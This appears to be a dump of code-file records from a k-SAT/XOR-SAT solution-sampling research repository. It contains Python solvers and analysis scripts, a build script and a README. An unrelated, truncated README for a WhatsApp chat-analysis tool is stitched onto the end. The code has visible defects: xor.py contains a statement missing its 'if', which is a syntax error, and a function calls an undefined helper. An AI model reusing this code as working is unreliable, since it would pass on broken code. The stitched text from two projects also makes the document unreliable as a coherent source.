range(N_sol):\n sol = all_solution[i]*idx_var\n res = self.check_solution(solution_array=sol)\n if res is True:\n count_true +=1\n else:\n print(\"Found wrong solution !?\")\n print(\"%i out of the %i solutions are correct\"%(count_true,N_sol))\n n_unique = len(np.unique(all_solution, axis=0))\n print(\"number of unique solutions :\\t %i\"%(n_unique))\n \n if hist is True:\n from matplotlib import pyplot as plt\n import seaborn as sns\n mag = np.mean(all_solution,axis=0)\n nbin = max([N_sol/10,20])\n N, M, alpha, K = self.infer_parameters(solution_file)\n sns.distplot(mag,bins=nbin,kde=False)\n plt.xlabel('magnetization')\n plt.title('nsample = %i, N=%i, M=%i, alpha=%.2f, K=%i'%(N_sol, N, M, alpha, K))\n plt.show()\n\n def infer_parameters(self, solution_file):\n sol_s = solution_file.strip(\".txt\").split('_')\n for p in sol_s:\n if '=' in p:\n ps = p.split('=')\n if ps[0] == 'N':\n N = int(float(ps[1]))\n elif ps[0] == 'M':\n M = int(float(ps[1]))\n elif ps[0] == 'alpha':\n alpha = float(ps[1])\n elif ps[0] == 'K':\n K = int(float(ps[1]))\n \n return N, M, alpha, K\n \n def check_solution(self, solution_file=None, solution_array=None, formula_file = None):\n\n K = self.K\n if formula_file is None:\n formula = self.formula\n else:\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' ')[:,:3]\n \n if solution_array is not None:\n solution = solution_array\n else:\n solution = np.loadtxt(solution_file, dtype=int)\n \n variable_label = np.abs(solution)\n var_max = np.max(variable_label)\n solution_map = np.zeros(var_max+1,dtype=int)\n solution_map[variable_label] = np.sign(solution)\n \n abs_formula = np.abs(formula)\n sign_formula = np.sign(formula)\n res = solution_map[abs_formula]*sign_formula\n\n return np.count_nonzero(np.sum(res, axis=1) == -K) == 0 # check that all clauses are SAT\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5157894492149353, "alphanum_fraction": 0.6421052813529968, "avg_line_length": 30.66666603088379, "blob_id": "ba2f5cfeb9ee4033b24264668fdabf6db4517bca", "content_id": "d9b893a48d22e4de1481452da74610ba5a566e2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 56, "num_lines": 3, "path": "/setup_code.sh", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "make clean -C sp-1.4/\nmake -C sp-1.4/\ncp sp-1.4/merge sp-1.4/sp sp-1.4/verify sp-1.4/walksat .\n" }, { "alpha_fraction": 0.6502766013145447, "alphanum_fraction": 0.6601106524467468, "avg_line_length": 28.272727966308594, "blob_id": "20eaf742467fcc0e2b6068cfbddabfd86c89e5e9", "content_id": "20b89449d67c385f41a81d39f1aefe5a6a96adf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1627, "license_type": "no_license", "max_line_length": 104, "num_lines": 55, "path": "/XOR/runme.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from xor import XOR_SOLVE\nimport sys, os\nimport time\nimport pickle\nimport numpy as np\n\nparam = {}\n### default parameters\nparam['N'] = 1000\nparam['alpha'] = 0.8\nparam['n_sample'] = 100\nparam['K'] = 3\n\n### command line specified parameters\nif len(sys.argv) > 1: # > > > read the parameters from the command line // overwrites default parameters\n for a in sys.argv[1:]:\n name, value = a.split('=')\n param[name] = float(value) # more stable across platforms to cast str to float \n\nparam['M'] = param['alpha']*param['N']\n\nprint('[xor.py] Running with the following parameters ...')\nprint(param)\n\nstart_time = time.time()\nxor = XOR_SOLVE(int(param['N']), int(param['M']), int(param['K']), save_formula=False)\nA_original = np.copy(xor.A)\n\nX = xor.sample_solution(int(param['n_sample']), verbose=True)\n\nprint('Elapsed time:', time.time() - start_time)\n\n# saving the solution and the formula (save the seed used to generate the formula ?) --> or not !\n# want to save the solution a data file, but is dependent on the formula used ...\nN=int(param['N'])\nalpha=param['alpha']\nK=int(param['K'])\n\nroot = 'data/'\nfile_formula = root+'formula/formula_idx=%i_N=%i_a=%.3f_K=%i.pkl'\nfile_solution = root+'sol/xor_sol_idx=%i_N=%i_a=%.3f_K=%i.pkl'\n\nidx = 0\nwhile os.path.isfile(file_formula%(idx, N, alpha, K)):\n idx+=1\n\nfile_formula=file_formula%(idx, N, alpha, K)\nfile_solution=file_solution%(idx, N, alpha, K)\n\nprint('[xor.py] data saved to :')\nprint(file_formula)\nprint(file_solution)\n\npickle.dump([xor.f, xor.y_original], open(file_formula,'wb'))\npickle.dump(np.packbits(X), open(file_solution,'wb'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.54356849193573, "alphanum_fraction": 0.6182572841644287, "avg_line_length": 23.200000762939453, "blob_id": "324bc7c8a0fdd9dc550bf4e4f44449419a3b372b", "content_id": "719fb782d112747c66d1742d22997987f0169cf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 56, "num_lines": 10, "path": "/check_sol.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from kSAT import KSAT\n\n\n# -----------> just check solutions --->\nmodel = KSAT()\nM=4050\na = 4.05\nsfile = 'sol_N=1000_M=%i_alpha=%.2f_K=3.txt'%(M,a)\nffile = 'formula.tmp_N=1000_M=%i_alpha=%a_K=3.cnf'%(M,a)\nmodel.check_all_solution(sfile,ffile)" }, { "alpha_fraction": 0.6282722353935242, "alphanum_fraction": 0.6544502377510071, "avg_line_length": 22.9375, "blob_id": "bb8778f0b40af2ca40cfe3ff398c8a3c70250359", "content_id": "8c43174c0561ddec9da14fda180ab02094aeee87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 382, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/README.md", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "Python wrapper for survey propagation/belief propagation C-code [see R. Zecchina].\nTo read solutions:\n\n```\nimport pickle\nimport numpy as np\nN=100\nM=350\nalpha=M/N\nfname = 'sol_N=%i_M=%i_alpha=%.2f_K=3.pkl'%(N, M, alpha)\na=pickle.load(open(fname,'rb'))\n\n######### DATA ###########\nX = np.unpackbits(a).astype(int).reshape(-1,N)\ns = np.unpackbits(a).astype(int).reshape(-1,N).shape\n```" }, { "alpha_fraction": 0.577826738357544, "alphanum_fraction": 0.6027899980545044, "avg_line_length": 27.375, "blob_id": "2add746b8b85e19618a95119fc952a4480bfb4f0", "content_id": "d59b7c523d09f246af6c3af752b4992ab4140c93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1362, "license_type": "no_license", "max_line_length": 74, "num_lines": 48, "path": "/XOR/analysis/plot_TSNE.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot as plt\nimport numpy as np\nimport pickle\nfrom fdc import FDC, plotting\nfrom sklearn.preprocessing import StandardScaler as SS\n\n\n# CONCLUSION => TSNE is a big \n# => be careful next time\n\nN=500\nK=3\nalpha_range = np.arange(0.5,1.001,0.01)\n\nroot= '/Users/alexandreday/GitProject/kSAT_sample/XOR/data/TSNE5/'\nroot_hist= '/Users/alexandreday/GitProject/kSAT_sample/XOR/data/distance/'\nroot_out= '/Users/alexandreday/GitProject/kSAT_sample/XOR/analysis/plots/'\n\nfor a in alpha_range:\n #print(a)\n f = 'tSNE_N=%i_a=%.3f_K=%i.pkl'%(N,a,K)\n X,l = pickle.load(open(root+f,'rb'))\n print(a,'\\t',l)\n #print(a, lX, pca_r,sep='\\t')\n\n plt.scatter(X[:,0], X[:,1],s=0.5)\n plt.show()\n \"\"\" f_hist = 'dist_N=%i_a=%.3f_K=%i.pkl'%(N,a,K)\n x,y = pickle.load(open(root_hist+f_hist,'rb')) \n #print(len(y[1:]),len(x))\n #plt.scatter(np.diff(y)+0.005,x)\n #print(len(x),len(y))\n plt.plot(y[1:],np.log(x))\n plt.show() \"\"\"\n #X = SS().fit_transform(X)\n #modelfdc=FDC(eta = 0.0)\n #modelfdc.fit(X)\n #plotting.cluster_w_label(X, modelfdc.cluster_label)\n\n \"\"\" plt.scatter(X[:,0], X[:,1], s=3, alpha=0.5)\n plt.title('$N=%i,\\\\alpha=%.3f, K=%i$'%(N,a,K))\n plt.xticks([])\n plt.yticks([])\n fout = f.strip('.pkl')+'.pdf'\n plt.tight_layout()\n plt.savefig(root_out+fout)\n plt.clf() \"\"\"\n #plt.show()\n" }, { "alpha_fraction": 0.6438127160072327, "alphanum_fraction": 0.6613712310791016, "avg_line_length": 34.20588302612305, "blob_id": "1abb5c956dadc6fb331f668e8b67f973cc18ca9b", "content_id": "9ed9da48426b7214097ce23ff12f45891c79b740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 105, "num_lines": 34, "path": "/XOR/analysis/distance.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from tsne_visual import TSNE\nimport numpy as np\nimport sys, os\nimport pickle\nfrom sklearn.decomposition import PCA\nfrom scipy.spatial.distance import squareform,cdist,pdist\n\ni_param = int(float(sys.argv[1].split('=')[1])) # specified through the command line !\n\nroot_in= '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/' # root absolute path insert here ...\nroot_out = '/projectnb/fheating/SAT_GLASS/XORSAT/analysis/distance/'\nfile_list = '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/file_name.txt' # absolute path insert here .. \n\ni_count = 0\nfname_out = None\nfor f in open(file_list,'r'):\n if i_count == i_param:\n fname_in = root_in+f.strip('\\n')\n sp = f.strip('\\n').split('_')\n param = sp[3:]\n fname_out = root_out+'dist_'+'_'.join(sp[3:])\n break\n i_count+=1\n\nprint('Reading from %s'%fname_in)\nprint('Saving in %s'%fname_out)\n\n# ---------> RUNNING TSNE\nif fname_out is not None:\n X = np.unpackbits(pickle.load(open(fname_in,'rb'))).astype(int).reshape(10000, -1)\n nonsquare = pdist(X, metric='hamming')\n D = squareform(nonsquare)\n y, x = np.histogram(nonsquare, bins=np.linspace(0.0025,1,100))\n pickle.dump([y, x], open(fname_out,'wb'))" }, { "alpha_fraction": 0.5112717747688293, "alphanum_fraction": 0.5257290005683899, "avg_line_length": 28.469314575195312, "blob_id": "cd44a17f19a2fd257c0edf50766d291a455c354c", "content_id": "7ac91b91983a8818643830acab1a68dec67fdb87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8162, "license_type": "no_license", "max_line_length": 96, "num_lines": 277, "path": "/XOR/xor.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport time\nimport pickle\nfrom collections import Counter\n\ndef main():\n\n alpha = np.arange(0.5, 1.001, 0.01)\n N=100\n K=3\n time_vs_alpha = []\n entropy_vs_alpha= []\n\n\n for a in alpha:\n print('alpha = %.3f'%a)\n M = int(a*N)\n xor = XOR_SOLVE(N, M, K, save_formula = True)\n t_start= time.time()\n X = xor.sample_solution(10000, verbose=True)\n time_vs_alpha.append(time.time() - t_start)\n entropy_vs_alpha.append(xor.entropy())\n\n for x in X:\n assert xor.check_solution(x)\n save_solution_file = 'sol/solution_N=%i_M=%i_K=%i.pkl'%(N,M,K)\n if len(X) > 0:\n pickle.dump(np.packbits(X), open(save_solution_file,'wb'))\n\n pickle.dump(entropy_vs_alpha, open('entropy/entropy_N=%i_M=%i_K=%i.pkl'%(N,M,K),'wb'))\n pickle.dump(time_vs_alpha, open('time/time_N=%i_M=%i_K=%i.pkl'%(N,M,K),'wb'))\n\ndef sample_tuple(N, K): # sample tuple uniformly at random\n trace = []\n tup = []\n for i in range(K):\n pos = np.random.randint(0, N-i)\n value = pos\n for t in reversed(trace): # iterate from last element\n if value > t-1:\n value +=1\n tup.append(value)\n trace.append(pos)#print(trace)\n tup.sort()\n return tup\n\ndef generate_XOR_formula(N=10, M=10, K=3):\n \"\"\" generates a XORSAT formula\n \"\"\"\n formula = set([])\n\n while len(formula) < M:\n tup = tuple(sample_tuple(N, K))\n formula.add(tup)\n return list(formula) # better to work with lists => order is always preserved ! \n\ndef generate_sparse(N=10, M=10, K=3, formula=None):\n # Can specify formula, but still have to specify N,M,K\n\n if formula is not None:\n formula = formula\n else:\n formula = generate_XOR_formula(N,M,K)\n\n A = np.zeros((M,N),dtype=int)\n for i, clause in enumerate(formula):\n for literal in clause:\n A[i, literal]=1\n return A, formula\n\ndef verify_solution(A, y, sol):\n nclause = A.shape[0]\n for i in range(nclause):\n if np.dot(A[i, :], sol) % 2 != y[i]:\n return False\n return True\n\ndef swap_rows(A, ri, rj):\n tmp = np.copy(A[ri, :]) # careful when slicing, will return a view\n A[ri, :] = A[rj, :]\n A[rj, :] = tmp\n \ndef swap(y, i, j):\n tmp = y[i]\n y[i] = y[j]\n y[j] = tmp\n\ndef add_to_row(A, ri, rj): # A[ri, :] <- A[ri, :] + A[rj, :]\n A[ri, :] = A[ri, :] + A[rj, :]\n\ndef make_diagonal(A_, y_, copy=False):\n \"\"\" This reduction is unique \"\"\" \n if copy:\n A=np.copy(A_)\n y=np.copy(y_)\n else:\n A = A_\n y = y_\n \n #1 clean up zero columns ? (no !)\n M, N = A.shape\n\n pos_pivot = 0\n pivot_list = []\n j = 0\n for i in range(M): # go over lines, for each line find pivot !\n for j in range(i, N):\n pos_one = np.where(A[:,j] == 1)[0]\n if len(pos_one) > 0:\n pos_one = pos_one[pos_one > (i - 1)]\n if len(pos_one) > 0:\n if A[i, j] == 0:\n swap_rows(A, i, pos_one[0])\n swap(y, i, pos_one[0])\n\n pos_one = np.where(A[:,j] == 1)[0]\n for k in pos_one:\n if k > i :\n A[k] += A[i] # mod 2\n A[k] = np.remainder(A[k], 2)\n y[k] = (y[k] + y[i])%2 # mod 2\n pivot_list.append([i, j])\n break\n\n for pivot in reversed(pivot_list):\n i, j = pivot\n pos_one = np.where(A[:,j] == 1)[0]\n pos_one = pos_one[pos_one < i]\n for k in pos_one:\n A[k] += A[i] # mod 2\n A[k] = np.remainder(A[k], 2)\n y[k] = (y[k] + y[i])%2 # mod 2\n\n if copy is True:\n return A, y, np.array(pivot_list,dtype=int)\n else:\n return np.array(pivot_list,dtype=int)\n\ndef find_pivot(A_UT):\n return np.where(np.diagonal(A_UT) == 1)[0]\n\ndef solve_ES(A, y):\n \"\"\" Solver using exhaustive search of all configurations \"\"\"\n nvar = A.shape[1]\n nsol = 2**nvar\n b2_array = lambda n10 : np.array(list(np.binary_repr(n10, width=nvar)), dtype=np.int)\n sol_list = []\n for i in range(nsol):\n sol = b2_array(i)\n if check_solution(A, y, sol):\n sol_list.append(sol)\n return sol_list\n\ndef marginals(solution_set): # unique variable marginals\n if len(solution_set) > 0:\n return np.mean(solution_set, axis=0)\n else:\n []\n\ndef enumerate_solution_GE(A, y):\n \"\"\" A has to be in a reduced form \"\"\"\n M, N = A.shape\n \n pivots = np.where(np.diagonal(A) == 1)[0] # pivots are identified\n none_pivots = np.setdiff1d(np.arange(N), pivots)\n none_pivots_2 = np.setdiff1d(np.arange(M), pivots)\n\n rank = len(pivots) # matrix rank\n xsol = -1*np.ones(N, dtype=int) # unconstrained variables are marked by a -2\n\n N_free = N - rank # upper bound on number of log of number of solutions (but may be fewer !)\n \n b2_array = lambda n10 : np.array(list(np.binary_repr(n10, width=N_free)), dtype=np.int)\n all_sol = []\n\n pivot_set = set(list(pivots))\n\n for i in range(2**N_free): # HERE REPLACE BY SAMPLING, THIS THE SPACE WE WISH TO SAMPLE !\n is_sol = False\n xsol = -1*np.ones(N, dtype=int) # unconstrained variables are marked by a -2\n xsol[none_pivots] = b2_array(i)\n y_res = np.remainder(np.dot(A[:,none_pivots], xsol[none_pivots].T) + y, 2)\n\n if np.count_nonzero(y_res[none_pivots_2] == 1) == 0:\n xsol[pivots] = y_res[pivots]\n is_sol = True\n if is_sol:\n all_sol.append(xsol)\n \n return all_sol\n\ndef is_SAT(A, y):\n tmp = np.sum(A, axis=1)\n return np.count_nonzero(y[tmp == 0] == 1) == 0 \n\ndef sample_solution_GE(A, y, pivot_ls):\n \"\"\" A is in row-echelon form with pivot position provided in pivot_ls\n \"\"\"\n M, N = A.shape\n t_init = time.time()\n n_pivot = len(pivot_ls)\n n_free = N - n_pivot\n pos_pivot = pivot_ls[:,1]\n none_pivot_pos = np.setdiff1d(np.arange(N), pos_pivot)\n xsol = np.ones(N,dtype=int)\n\n xsol[none_pivot_pos] = np.random.randint(0, 2, n_free)\n for p in reversed(pivot_ls):\n i, j = p\n xsol[j]^= (y[i] + np.dot(A[i, :], xsol)) % 2\n \n assert verify_solution(A, y, xsol)\n return xsol\n\nclass XOR_SOLVE:\n\n def __init__(self, N=100, M=80, K=3, f=None, y=None, save_formula=True):\n self.N = N\n self.M = M\n self.K = K\n self.A, self.f = generate_sparse(N, M, K, formula = f) # A is not reduced at this point\n \n if save_formula:\n file_name = 'formula/formula_N=%i_M=%i_K=%i.pkl'%(N,M,K)\n pickle.dump(self.f, open(file_name,'wb'))\n\n if y is not None:\n self.y_original = np.copy(y)\n else:\n self.y_original= np.random.randint(0, 2, M) # random constraints\n\n self.y = np.copy(self.y_original)\n self.is_reduced = False\n \n def reduce_system(self):\n self.pivots = make_diagonal(self.A, self.y)\n self.is_reduced = True\n \n def entropy(self):\n if self.SAT():\n return (self.N - len(self.pivots))/self.N\n else:\n return 0\n\n def SAT(self):\n if not self.is_reduced:\n self.reduce_system()\n return is_SAT(self.A, self.y)\n \n def sample_solution(self, n_sample = 10, verbose = 0):\n \n if not self.is_reduced:\n self.reduce_system()\n if self.SAT() is False:\n print(\"No SOLUTION\")\n return []\n\n x_sample_solution = []\n for i in range(n_sample):\n if verbose != 0:\n if i % 500 == 0:\n print(i)\n x_sample_solution.append(sample_solution_GE(self.A, self.y, self.pivots))\n\n return x_sample_solution\n \n def check_solution(self, x):\n return verify_solution(self.A, self.y, x)\n\n def check_solution_formula(self, x):\n for i, clause in enumerate(self.f):\n np.sum(x[np.array(list(clause))]) % 2 != self.y_original[i]:\n return False\n return True\n \nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5668449401855469, "alphanum_fraction": 0.625668466091156, "avg_line_length": 22.41666603088379, "blob_id": "853dee50e0c7a4fd7c7474eb4e51ed8d913637d9", "content_id": "5c641042a5e7ad123efc86281e3b8f8645697aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 123, "num_lines": 24, "path": "/XOR/analysis/analysis.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\nimport sys\nsys.path.append('..')\nfrom xor import XOR_SOLVE\n\n\n\ndef main():\n\n root_sol = '../data/sol/'\n root_formula = '../data/formula/'\n\n N=1000\n\n formula, y = pickle.load(open(root_formula + 'formula_idx=0_N=1000_a=0.800_K=3.pkl','rb'))\n X = np.unpackbits(pickle.load(open(root_sol + 'xor_sol_idx=0_N=1000_a=0.800_K=3.pkl','rb'))).astype(int).reshape(-1, N)\n xor = XOR_SOLVE(N=1000, M=800, K=3, f=formula, y=y, save_formula=False)\n\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6318770051002502, "alphanum_fraction": 0.651294469833374, "avg_line_length": 34.28571319580078, "blob_id": "5519c36ff8d3b9a41681a0cc9dacc76dc8e739a0", "content_id": "599417871cbb951061b828491ec2e220e7f46c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 105, "num_lines": 35, "path": "/XOR/analysis/tSNE.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from tsne_visual import TSNE\nimport numpy as np\nimport sys, os\nimport pickle\nfrom sklearn.decomposition import PCA\n\ni_param = int(float(sys.argv[1].split('=')[1])) # specified through the command line !\n\nroot_in= '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/' # root absolute path insert here ...\nroot_out = '/projectnb/fheating/SAT_GLASS/XORSAT/analysis/TSNE2/'\nfile_list = '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/file_name.txt' # absolute path insert here .. \n\ni_count = 0\nfname_out = None\nfor f in open(file_list,'r'):\n if i_count == i_param:\n fname_in = root_in+f.strip('\\n')\n sp = f.strip('\\n').split('_')\n param = sp[3:]\n fname_out = root_out+'tSNE_'+'_'.join(sp[3:])\n break\n i_count+=1\n\nprint('Reading from %s'%fname_in)\nprint('Saving in %s'%fname_out)\n\n# ---------> RUNNING TSNE\nif fname_out is not None:\n X = np.unpackbits(pickle.load(open(fname_in,'rb'))).astype(int).reshape(10000,-1) \n X = np.unique(X, axis=0)\n model = TSNE(n_components=2, n_iter=2000, perplexity=50)\n pca = PCA(n_components=100)\n Xpca = pca.fit_transform(X)\n Xtsne = model.fit_transform(Xpca)\n pickle.dump([Xtsne, np.sum(pca.explained_variance_ratio_),len(X)], open(fname_out,'wb'))\n\n" } ]
11
andreaalf97/whatsapp_analysis
https://github.com/andreaalf97/whatsapp_analysis
c48225036ed355fa63aa76ec3c018cee3e6b7647
4e6e9530489532b7314ffe2cab3689a95399117c
2f9cf29a6474325cb43df9a49df7d7198c5eed3b
refs/heads/master
2023-01-07T02:03:12.172382
2020-11-03T14:48:03
2020-11-03T14:48:03
308,381,134
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47771748900413513, "alphanum_fraction": 0.48659759759902954, "avg_line_length": 38.48701477050781, "blob_id": "266b8b88af8e4bd589ae91ab3f3fdfee03b707d2", "content_id": "ae0300a87e621d251a3c2d23e803eecb6dce5e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6091, "license_type": "no_license", "max_line_length": 117, "num_lines": 154, "path": "/src/file_handler.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom os import path\nimport datetime as dt\n\nfrom src.dataframe_analysis import df_setup\nfrom src.misc import print_separator_line\n\n\ndef file_to_csv_format(file_path: str, is_apple: bool) -> str:\n out_file_path = file_path.replace(\".txt\", \".tmp\")\n\n with open(file_path, \"r\") as in_file:\n with open(out_file_path, \"w\") as out_file:\n\n this_line = in_file.readline()\n next_line = in_file.readline()\n\n out_file.write(\"datetime|author|message\\n\")\n\n if is_apple:\n while next_line:\n\n if \"‎\" in this_line:\n this_line = next_line\n next_line = in_file.readline()\n continue\n\n valid_next_line: bool = (\n next_line.count(\"[\") == 1 and\n next_line.count(\"]\") == 1 and\n next_line.split(\"] \", 1)[0].count(\":\") == 2\n )\n\n if not valid_next_line:\n this_line = this_line.replace(\"\\n\", \"__n__\") + next_line.replace(\"\\n\", \"__n__\") + \"\\n\"\n next_line = in_file.readline()\n continue\n\n this_line = this_line.replace(\"|\", \"__x__\")\n this_line = this_line.replace(\"*\", \"__a__\")\n this_line = this_line.replace('\"', \"__vv__\")\n this_line = this_line.replace(\"'\", \"__v__\")\n this_line = this_line.replace(\"“\", \"__vv__\")\n\n if \"PM\" in this_line.split(\"] \", 1)[0]:\n hour_str = this_line.split(\", \", 1)[1].split(\":\", 1)[0]\n hour = int(hour_str)\n if hour != 12:\n hour += 12\n\n this_line = this_line.split(\", \", 1)[0] + \", \" + str(hour) + \":\" + this_line.split(\":\", 1)[1]\n this_line = this_line.replace(\"PM\", \"AM\", 1)\n\n this_line = this_line.replace(\"[\", \"\", 1) \\\n .replace(\", \", \" \", 1)\\\n .replace(\" AM] \", \"|\", 1)\\\n .replace(\": \", \"|\", 1)\n\n out_file.write(this_line)\n\n this_line = next_line\n next_line = in_file.readline()\n else:\n while next_line:\n\n if \"‎\" in this_line or this_line.count(\":\") < 2 or \"Hai cambiato l'oggetto da “\" in this_line:\n this_line = next_line\n next_line = in_file.readline()\n continue\n\n valid_next_line: bool = (\n next_line.split(\",\", 1)[0].count(\"/\") == 2\n )\n\n if not valid_next_line:\n this_line = this_line.replace(\"\\n\", \"__n__\") + next_line.replace(\"\\n\", \"__n__\") + \"\\n\"\n next_line = in_file.readline()\n continue\n\n this_line = this_line.replace(\"|\", \"__x__\")\n this_line = this_line.replace(\"*\", \"__a__\")\n this_line = this_line.replace('\"', \"__vv__\")\n this_line = this_line.replace(\"“\", \"__vv__\")\n this_line = this_line.replace(\"'\", \"__v__\")\n\n this_line = this_line.replace(\", \", \" \", 1) \\\n .replace(\" - \", \":00|\", 1) \\\n .replace(\": \", \"|\", 1)\n\n out_file.write(this_line)\n\n this_line = next_line\n next_line = in_file.readline()\n return out_file_path\n\n\ndef load_data_frame(file_path: str, is_apple: bool) -> pd.DataFrame:\n\n # If the backup .frames folder does not exist, I create one\n if not path.isdir(\"../chats/.frames\"):\n os.mkdir(\"../chats/.frames\")\n\n # The backup file has the same name as the original but is .zip file and is\n # saved in the .frames folder\n dataframe_file_path = file_path.replace(\".txt\", \"\") + \".zip\"\n dataframe_file_path = dataframe_file_path.replace(\"chats/\", \"chats/.frames/\")\n\n if path.isfile(dataframe_file_path): # if the file exists it needs to be pickled\n\n print(\"LOADING BACKUP..\")\n beginning = dt.datetime.now()\n df = pd.read_pickle(dataframe_file_path)\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to load the pickled dataset\")\n\n beginning = dt.datetime.now()\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the df_info dictionary\")\n\n print(\"BACKUP LOADED\")\n\n else: # Otherwise, we have to create the dataframe and store is as a pickle file\n\n print(\"CREATING CSV FORMATTED FILE\")\n beginning = dt.datetime.now()\n temp_file_path = file_to_csv_format(file_path, is_apple) # Transforms the input file into a csv file\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the CSV file\")\n\n print(\"LOADING DATAFRAME FROM CSV\")\n beginning = dt.datetime.now()\n df = pd.read_csv(temp_file_path, sep=\"|\") # Reads the csv into a dataframe\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the CSV file\")\n\n df = df_setup(df)\n\n os.remove(temp_file_path) # Deletes the csv file because it's not helpful anymore\n\n beginning = dt.datetime.now()\n df.to_pickle(dataframe_file_path) # Pickles the dataframe into a zip file and saves it\n print(\"It took\", (dt.datetime.now() - beginning).microseconds /1000, \"ms to pickle the dataframe\")\n\n print(\"BACKUP SAVED AT\", dataframe_file_path)\n\n print(\"FRAME LOADED\")\n print_separator_line()\n print_separator_line()\n return df\n\n\ndef print_example(file_path: str, n: int):\n print(\"An example of the dataframe\")\n with open(file_path, \"r\") as file:\n i = 0\n for i in range(n):\n print(file.readline())\n" }, { "alpha_fraction": 0.6174089312553406, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 37, "blob_id": "8e5b7a1da3642884d9e6cd98411c2147f93cf758", "content_id": "385f7873bf2d581146eba80c8c341316b3c2032f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 96, "num_lines": 39, "path": "/src/main.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "import src.dataframe_analysis as analysis\nfrom src.file_handler import print_example, load_data_frame\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n pd.set_option('display.max_colwidth', 300)\n\n # Reading the file path from the user input\n # file_path: str = input(\"Insert the name of the chat you want to analyze:\")\n # file_path = \"../chats/\" + file_path + \".txt\"\n # while not path.isfile(file_path):\n # print(\"NOT AN EXISTING PATH\")\n # file_path: str = input(\"Insert the name of the chat you want to analyze:\")\n # file_path = \"../chats/\" + file_path + \".txt\"\n #\n # # Reading if the file is a iOS file from the user input\n # is_apple_input: str = input(\"Is the chat file generated from an iOS device?\")\n # is_apple: bool = (is_apple_input == \"y\" or is_apple_input == \"Y\" or is_apple_input == \"1\")\n\n file_path = \"../chats/Sara_Gotti.txt\"\n is_apple = False\n\n df = load_data_frame(file_path, is_apple)\n\n # filtered = analysis.filter(df, words_or=[\"hu\", \"Hu\", \"HU\"])\n # print(filtered[[\"author\", \"message\"]])\n\n analysis.df_general_info(df)\n # analysis.df_length_info(df)\n # analysis.df_plot_month_year(df, start=\"03-2015\", end=\"12-2015\")\n # analysis.df_plot_month_year(df, auto=True)\n analysis.df_plot_year(df)\n # analysis.df_plot_days(df, auto=True)\n # analysis.df_emojis(df)\n # analysis.df_words(df)\n\n # analysis.df_month_analysis(df, month=\"5\", year=\"2020\")\n" }, { "alpha_fraction": 0.681073009967804, "alphanum_fraction": 0.6959761381149292, "avg_line_length": 18.735294342041016, "blob_id": "70d50bd80c782f621ad6dcc3c8d4e1158365c1f6", "content_id": "90785c3e785314d962e61cd476ab5d9727d1c3fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 686, "license_type": "no_license", "max_line_length": 59, "num_lines": 34, "path": "/README.md", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "# WhatsApp Analysis\nA data analysis and visualization tool for WhatsApp chats\n\n## Example\nHere's and example of what these scripts are able to create\n\n### Plots\n**Different plots for different timeperiods**\n![](example_images/timeperiod.png)\n![](example_images/all_years.png)\n\n**Overall and per author emoji counters**\n\nFriend:<br>\n😂 -- 43<br>\n👍 -- 30<br>\n🎉 -- 30<br>\n🎩 -- 27<br>\n😏 -- 17\n\n![](example_images/emojis.png)\n\n## Wordclouds\n**Overall**\n![](example_images/overall_words.png)\n\n**Someone really enjoying himself**\n![](example_images/be.png)\n\n**Someone who is always 